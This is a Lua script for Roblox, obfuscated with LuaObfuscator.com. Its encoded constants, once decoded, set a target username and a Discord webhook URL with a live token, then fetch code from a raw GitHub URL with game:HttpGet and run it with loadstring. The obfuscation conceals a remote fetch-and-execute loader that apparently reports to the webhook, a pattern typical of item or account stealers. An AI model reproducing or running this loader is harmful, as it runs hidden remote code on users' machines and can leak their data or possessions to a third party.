--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v81=0 -0 ;local v82;while true do if (v81==(0 -0)) then v82=(v31/(2^(v32-((878 -(282 + 595)) -0))))%((4 -(1639 -(1523 + 114)))^(((v33-1) -(v32-(620 -(555 + 64)))) + 1)) ;return v82-(v82%(932 -(857 + 74))) ;end end else local v83=((513 + 57) -(367 + (286 -85)))^(v32-(928 -(214 + 713))) ;return (((v31%(v83 + v83))>=v83) and ((1066 -(68 + 997)) + 0)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + (1274 -(226 + 1044)) ;return (v37 * (73054774 -56277558)) + (v36 * (65653 -(8 + 24 + 85))) + (v35 * (251 + 5)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==(393 -(232 + 160))) then v41=nil;v42=nil;v38=2 -0 ;end if (v38~=3) then else v45=nil;while true do local v89=0 -0 ;while true do if (v89~=1) then else if (v39==(1386 -(746 + 638))) then for v99=1,v44 do local v100=1277 -(37 + 1240) ;local v101;local v102;local v103;while true do if (v100==(3 -2)) then v103=nil;while true do if (v101==(3 -2)) then if (v102==(1 -0)) then v103=v22()~=(341 -(218 + 123)) ;elseif (v102==2) then v103=v25();elseif (v102==3) then v103=v26();end v45[v99]=v103;break;end if (v101==(0 + 0)) then local v159=0 + 0 ;local v160;while true do if (v159~=0) then else v160=0 + 0 ;while true do if (v160==(561 -(306 + 254))) then v101=1 + 0 ;break;end if (v160==(0 -0)) then v102=v22();v103=nil;v160=1 + 0 ;end end break;end end end end break;end if (v100==(1467 -(899 + 568))) then v101=1474 -(1329 + 145) ;v102=nil;v100=1;end end end v43[974 -(140 + 831) ]=v22();for v104=1 + 0 ,v24() do local v105=0 -0 ;local v106;while true do if (v105~=0) then else v106=v22();if (v21(v106,604 -(268 + 335) ,1851 -(1409 + 441) )==(718 -(15 + 703))) then local v153=0;local v154;local v155;local v156;local v157;while true do if ((1 + 0)~=v153) then else local v161=0;while true do if (v161==(438 -(262 + 176))) then v156=nil;v157=nil;v161=1457 -(282 + 1174) ;end if (v161==(1722 -(345 + 1376))) then v153=2;break;end end end if ((688 -(198 + 490))==v153) then local v162=0 -0 ;while true do if (v162~=(2 -1)) then else v153=1 + 0 ;break;end if (v162==(1206 -(696 + 510))) then v154=0;v155=nil;v162=1;end end end if (v153==(3 -1)) then while true do if (v154==(1264 -(1091 + 171))) then local v163=0;local v164;while true do if (v163==(1271 -(945 + 326))) then v164=0 + 0 ;while true do if (v164==(2 -1)) then v154=3;break;end if (v164==(0 -0)) then local v173=0;while true do if (v173~=0) then else if (v21(v156,1 + 0 ,3 -2 )==(375 -(123 + 251))) then v157[9 -7 ]=v45[v157[1502 -(1408 + 92) ]];end if (v21(v156,700 -(208 + 490) ,1 + 1 )~=(1 + 0)) then else v157[1 + 2 ]=v45[v157[839 -(660 + 176) ]];end v173=1172 -(418 + 753) ;end if (v173~=(1 + 0)) then else v164=203 -(14 + 188) ;break;end end end end break;end end end if (v154~=(675 -(534 + 141))) then else local v165=0 + 0 ;local v166;while true do if (v165==(0 + 0)) then v166=0 + 0 ;while true do if ((530 -(406 + 123))==v166) then v154=1770 -(1749 + 20) ;break;end if (v166==0) then local v174=0;while true do if (v174~=(0 + 0)) then else v155=v21(v106,3 -1 ,3);v156=v21(v106,4,6);v174=1 -0 ;end if (v174==(1 + 0)) then v166=2 -1 ;break;end end end end break;end end end if (v154~=(2 + 1)) then else if (v21(v156,3,6 -3 )~=(2 -1)) then else v157[3 + 1 ]=v45[v157[4]];end v40[v104]=v157;break;end if (v154~=(1901 -(106 + 1794))) then else local v168=396 -(115 + 281) ;while true do if (v168==1) then v154=4 -2 ;break;end if (v168==(0 + 0)) then v157={v23(),v23(),nil,nil};if (v155==(0 -0)) then local v171=867 -(550 + 317) ;local v172;while true do if (v171==(0 -0)) then v172=0;while true do if (v172==0) then v157[3]=v23();v157[4]=v23();break;end end break;end end elseif (v155==1) then v157[3 -0 ]=v24();elseif (v155==2) then v157[3 -0 ]=v24() -((586 -(57 + 527))^(44 -28)) ;elseif (v155~=3) then else local v183=0;local v184;local v185;while true do if (v183==(285 -(134 + 151))) then local v186=1665 -(970 + 695) ;while true do if (v186==(0 -0)) then v184=0 -0 ;v185=nil;v186=1;end if (v186~=1) then else v183=167 -(122 + 44) ;break;end end end if (v183~=1) then else while true do if (v184~=(0 -0)) then else v185=0;while true do if ((0 -0)==v185) then v157[3]=v24() -((2 + 0)^16) ;v157[1 + 3 ]=v23();break;end end break;end end break;end end end v168=1991 -(582 + 1408) ;end end end end break;end end end break;end end end v39=10 -7 ;end if (v39~=(0 -0)) then else local v96=0 -0 ;while true do if (v96==(1 + 0)) then v42={};v39=1258 -(1043 + 214) ;break;end if (v96==(1824 -(1195 + 629))) then v40={};v41={};v96=1 -0 ;end end end break;end if (v89~=(241 -(187 + 54))) then else if (v39~=(583 -(361 + 219))) then else local v97=780 -(162 + 618) ;while true do if (v97~=(320 -(53 + 267))) then else for v147=1 + 0 ,v24() do v41[v147-(1 + 0) ]=v29();end return v43;end end end if (v39==1) then local v98=0;while true do if (0~=v98) then else v43={v40,v41,nil,v42};v44=v24();v98=1;end if (v98==(983 -(18 + 964))) then v45={};v39=3 -1 ;break;end end end v89=1;end end end break;end if (v38~=(2 -0)) then else v43=nil;v44=nil;v38=1 + 2 ;end if (v38~=(1636 -(1373 + 263))) then else v39=1000 -(451 + 549) ;v40=nil;v38=1 + 0 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=1;local v49=(v21(v47,851 -((997 -(553 + 424)) + 830) ,16 + 4 ) * ((128 -(116 + 10))^(3 + 29))) + v46 ;local v50=v21(v47,759 -(542 + 196) ,66 -35 );local v51=((v21(v47,(18 -8) + 22 )==(1 + 0)) and  -(1 + 0)) or (2 -1) ;if (v50==(0 -0)) then if (v49==0) then return v51 * (1551 -(1126 + 425)) ;else v50=406 -(118 + 287) ;v48=0 -0 ;end elseif (v50==2047) then return ((v49==((988 + 133) -(118 + 1003))) and (v51 * ((2 -(1 + 0))/(377 -(142 + 235))))) or (v51 * NaN) ;end return v8(v51,v50-(4640 -3617) ) * (v48 + (v49/((1 + 1)^52))) ;end v26=nil;function v26(v52)local v53;if  not v52 then local v84=0 + 0 ;while true do if (v84==0) then v52=v24();if (v52==(0 + 0)) then return "";end break;end end end v53=v3(v16,v19,(v19 + v52) -(1 + 0) );v19=v19 + v52 ;local v54={};for v65=2 -(2 -1) , #v53 do v54[v65]=v2(v1(v3(v53,v65,v65)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=v1(v16,v19,v19);v19=v19 + 1 ;return v55;end v23=nil;function v23()local v56,v57=v1(v16,v19,v19 + (4 -2) );v19=v19 + 1 + 1 ;return (v57 * (1237 -981)) + v56 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v58)if (v1(v58,2)==79) then v20=v0(v3(v58,1,1));return "";else local v85=v2(v0(v58,16));if v20 then local v90=v5(v85,v20);v20=nil;return v90;else return v85;end end end);v18=1;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=8) then if (v80<=3) then if (v80<=1) then if (v80>0) then local v107=v79[2];local v108=v77[v79[3]];v77[v107 + 1 ]=v108;v77[v107]=v108[v79[4]];else local v112=v79[2];local v113=v77[v79[3]];v77[v112 + 1 ]=v113;v77[v112]=v113[v79[4]];end elseif (v80==2) then do return;end else v77[v79[2]]=v79[3];end elseif (v80<=5) then if (v80>4) then v77[v79[2]]();else v77[v79[2]]();end elseif (v80<=6) then local v119=v79[2];local v120,v121=v70(v77[v119](v13(v77,v119 + 1 ,v79[3])));v72=(v121 + v119) -1 ;local v122=0;for v138=v119,v72 do v122=v122 + 1 ;v77[v138]=v120[v122];end elseif (v80==7) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=12) then if (v80<=10) then if (v80>9) then do return;end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80==11) then local v125=v79[2];v77[v125]=v77[v125](v13(v77,v125 + 1 ,v72));else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=14) then if (v80==13) then v77[v79[2]]=v61[v79[3]];else local v131=0;local v132;local v133;local v134;local v135;while true do if (v131==2) then for v150=v132,v72 do v135=v135 + 1 ;v77[v150]=v133[v135];end break;end if (v131==1) then v72=(v134 + v132) -1 ;v135=0;v131=2;end if (v131==0) then v132=v79[2];v133,v134=v70(v77[v132](v13(v77,v132 + 1 ,v79[3])));v131=1;end end end elseif (v80<=15) then v77[v79[2]]=v61[v79[3]];elseif (v80>16) then local v143=v79[2];v77[v143]=v77[v143](v13(v77,v143 + 1 ,v72));else v77[v79[2]]=v79[3];end v71=v71 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O0003023O005F4703083O00557365724E616D65030E3O0042726F6B656261636F6E6A386A2003093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132302O34353238373134303433383136382F30394E6B713046786E5F544B306C3144333441444533306C4C77356E34657A3344317552544B7A4849567663746C4F65434B6D6A356943747A2D41674376367978675236030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O00120F3O00013O0030093O0002000300120F3O00013O0030093O0004000300120F3O00013O0030093O0005000600120F3O00073O00120F000100083O00202O0001000100090012100003000A4O0008000400014O000E000100044O00115O00022O00043O000100012O00023O00017O00",v9(),...);end
